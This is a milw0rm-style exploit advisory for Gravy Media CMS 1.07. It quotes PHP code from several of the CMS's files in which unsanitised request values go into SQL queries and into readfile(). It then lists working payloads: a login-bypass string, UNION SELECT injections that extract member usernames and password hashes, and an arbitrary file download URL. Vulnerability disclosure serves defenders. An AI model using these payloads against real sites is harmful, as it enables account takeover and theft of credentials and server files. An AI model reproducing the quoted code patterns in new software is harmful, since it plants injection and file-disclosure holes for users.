eLouai's Download Script

######################################################################################### [0x01] Informations: Name : Gravy Media Cms 1.07 Download : http://www.gravy-media.com/downloads.php Vulnerability : Multiple Sql Injections & Arbitrary File Download Author : x0r Contact : andry2000@hotmail.it Notes : Proud To Be Italian Greetz : // ######################################################################################### [0x02] Bug: Bugged file is /[path]/login.php [..] viewmsg.php [..] rate.php [..]forcedownload.php [code] //IF SUBMIT PRESSED FOR LOGIN if(isset($_POST['submit'])) { $get_app = mysql_query("SELECT * FROM `members` WHERE username = '".$_POST['username']."' AND user_password = '".md5($_POST['password'])."'"); [/code] [code] //you've to be logged //We need to grab the msg_id variable from the URL. $msg_id = $_REQUEST['msg_id']; //Get all of the information about the message with and id number of the one sent through the URL $view_msg = mysql_query("SELECT * FROM messages WHERE id = '$msg_id'"); $msg = mysql_fetch_array($view_msg); [/code] [code] include "connect.php"; $action = $_GET["action"]; if (!$action) $action = $_POST["action"]; //print"action = $action"; if ($action == "rate"){ $filename = $_GET["file"]; $getcount = mysql_query("SELECT * FROM files WHERE image='$filename'"); [/code] [code] $filename = $_GET['file']; //Huge thank you to eLouai for this simple but powerful add-on // required for IE, otherwise Content-disposition is ignored if(ini_get('zlib.output_compression')) ini_set('zlib.output_compression', 'Off'); // addition by Jorg Weske $file_extension = strtolower(substr(strrchr($filename,"."),1)); if( $filename == "" ) { echo "eLouai's Download ScriptERROR: download file NOT SPECIFIED. USE force-download.php?file=filepath"; exit; } elseif ( ! file_exists( $filename ) ) { echo "eLouai's Download ScriptERROR: File not found. USE force-download.php?file=filepath"; exit; }; switch( $file_extension ) { case "pdf": $ctype="application/pdf"; break; case "exe": $ctype="application/octet-stream"; break; case "zip": $ctype="application/zip"; break; case "doc": $ctype="application/msword"; break; case "xls": $ctype="application/vnd.ms-excel"; break; case "ppt": $ctype="application/vnd.ms-powerpoint"; break; case "gif": $ctype="image/gif"; break; case "png": $ctype="image/png"; break; case "jpeg": case "jpg": $ctype="image/jpg"; break; default: $ctype="application/force-download"; } header("Pragma: public"); // required header("Expires: 0"); header("Cache-Control: must-revalidate, post-check=0, pre-check=0"); header("Cache-Control: private",false); // required for certain browsers header("Content-Type: $ctype"); // change, added quotes to allow spaces in filenames, by Rajkumar Singh header("Content-Disposition: attachment; filename=\"".basename($filename)."\";" ); header("Content-Transfer-Encoding: binary"); header("Content-Length: ".filesize($filename)); readfile("$filename"); exit(); [/code] ######################################################################################### [0x03] Exploits: 1- admin' or ' 1=1-- 2- [LoginRequired] http://site.it/viewmsg.php?msg_id=' union select 0,0,0,concat(username,char(54),user_password),0,0 from members-- 3- http://site.it/rate.php?action=rate&file=' union select 0,0,0,concat(username,user_password),0,0 from members-- 4- http://site.it/forcedownload.php?file=[file] ######################################################################################## # milw0rm.com [2009-03-30]

Query Builder